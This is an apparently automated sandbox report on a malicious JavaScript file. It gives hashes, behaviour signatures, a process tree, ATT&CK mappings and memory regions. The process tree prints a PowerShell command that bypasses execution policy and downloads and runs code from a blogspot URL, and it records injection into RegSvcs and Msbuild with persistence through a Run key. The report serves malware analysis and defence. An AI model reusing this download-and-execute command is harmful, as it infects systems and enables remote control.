Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-05-2024 07:27

General

  • Target

    d59eb32c67feacb9d79fe315bf304d5f .js

  • Size

    1.3MB

  • MD5

    d59eb32c67feacb9d79fe315bf304d5f

  • SHA1

    a3bfbfa3216bd083085d47583cfc991731ee2f4b

  • SHA256

    d9e9cd6107b1f2a44a9d0ff9cf16eca68680851d7f0eead5830c5f2a01b6c003

  • SHA512

    44fdbb965adbc4ecd77dd5035fc7c76f822764bd41c765a41eafd6227b2515ba898a86f36aecab2d6f2222129f5123f455b74322fbbb25bab090cdd310a02085

  • SSDEEP

    768:IJqH+QqJcx5TnTi9ta7SuHiHwdcU6AH6xgO:xqo5TnTi9A6H9AH83

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 6 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\d59eb32c67feacb9d79fe315bf304d5f .js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5116
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm mainhotel5may.blogspot.com//////////////////////hehehehe) | . iex;Start-Sleep -Seconds 3;
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1172
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1376
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2628
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4000
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 780
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:3028
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3872
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 788
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:3108
      • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4072
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 792
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:1636
      • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2708
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 784
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:2148

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

JavaScript

1
T1059.007

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lx5ggkdw.m0l.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1172-21-0x0000019D62740000-0x0000019D62748000-memory.dmp
    Filesize

    32KB

  • memory/1172-13-0x0000019D7BDA0000-0x0000019D7BF62000-memory.dmp
    Filesize

    1.8MB

  • memory/1172-65-0x00007FFC1B380000-0x00007FFC1BE41000-memory.dmp
    Filesize

    10.8MB

  • memory/1172-12-0x00007FFC1B380000-0x00007FFC1BE41000-memory.dmp
    Filesize

    10.8MB

  • memory/1172-64-0x00007FFC1B380000-0x00007FFC1BE41000-memory.dmp
    Filesize

    10.8MB

  • memory/1172-14-0x00007FFC1B380000-0x00007FFC1BE41000-memory.dmp
    Filesize

    10.8MB

  • memory/1172-16-0x0000019D00000000-0x0000019D0000E000-memory.dmp
    Filesize

    56KB

  • memory/1172-29-0x00007FFC1B380000-0x00007FFC1BE41000-memory.dmp
    Filesize

    10.8MB

  • memory/1172-18-0x0000019D626F0000-0x0000019D626FA000-memory.dmp
    Filesize

    40KB

  • memory/1172-19-0x0000019D62720000-0x0000019D62728000-memory.dmp
    Filesize

    32KB

  • memory/1172-20-0x0000019D62730000-0x0000019D62738000-memory.dmp
    Filesize

    32KB

  • memory/1172-0-0x00007FFC1B383000-0x00007FFC1B385000-memory.dmp
    Filesize

    8KB

  • memory/1172-11-0x00007FFC1B380000-0x00007FFC1BE41000-memory.dmp
    Filesize

    10.8MB

  • memory/1172-1-0x0000019D7B6B0000-0x0000019D7B6D2000-memory.dmp
    Filesize

    136KB

  • memory/1172-17-0x0000019D62700000-0x0000019D6271A000-memory.dmp
    Filesize

    104KB

  • memory/1172-63-0x00007FFC1B383000-0x00007FFC1B385000-memory.dmp
    Filesize

    8KB

  • memory/1376-30-0x0000000005550000-0x00000000055B6000-memory.dmp
    Filesize

    408KB

  • memory/1376-28-0x0000000000D40000-0x0000000000DC6000-memory.dmp
    Filesize

    536KB

  • memory/1376-22-0x0000000000400000-0x0000000000486000-memory.dmp
    Filesize

    536KB

  • memory/2628-33-0x0000000005AD0000-0x0000000006074000-memory.dmp
    Filesize

    5.6MB

  • memory/2628-36-0x00000000055C0000-0x0000000005652000-memory.dmp
    Filesize

    584KB

  • memory/2628-59-0x0000000006450000-0x0000000006612000-memory.dmp
    Filesize

    1.8MB

  • memory/2628-60-0x0000000006BC0000-0x0000000006C5C000-memory.dmp
    Filesize

    624KB

  • memory/2628-61-0x0000000006CC0000-0x0000000006D10000-memory.dmp
    Filesize

    320KB

  • memory/2628-62-0x0000000006E10000-0x0000000006E1A000-memory.dmp
    Filesize

    40KB